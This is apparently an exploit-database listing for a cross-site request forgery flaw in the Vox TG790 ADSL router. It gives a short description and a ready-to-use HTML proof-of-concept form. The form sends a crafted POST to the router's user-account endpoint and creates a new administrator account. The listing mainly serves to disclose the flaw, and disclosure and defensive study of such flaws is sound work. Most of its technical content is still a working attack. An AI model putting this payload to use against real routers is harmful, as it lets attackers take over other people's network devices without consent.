Vox TG790 ADSL Router Cross-Site Request Forgery (Add Admin)

2018.08.24
Credit: Cakes
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Title: Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin) # Author: Cakes # Exploit Date: 2018-08-01 # Vendor: Vox Telecom # Link: https://www.vox.co.za/ # Firmware Version: 6.2.W.1 # CVE: N/A # Description # Due to improper session management low privilege users are able to create # administrator accounts through a crafted POST request. # PoC <html> <form action="https://TARGET/cgi/b/users/cfg/usraccedit/?be=0&l0=2&l1=9&tid=ADD_USER" method="POST"> <input type="hidden" name="0" id="0" value="10"> <input type="hidden" name="1" id="1" value="usrAccApply"> <input type="hidden" name="34" id="34" value="LulzCakes"> <input type="hidden" name="36" id="36" value="1"> <input type="text" name="33" id="33" placeholder="Account Name"> <br /> <input type="text" name="31" id="31" value="Administrator"> <br /> <input type="submit" value="W00ts"> </form> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top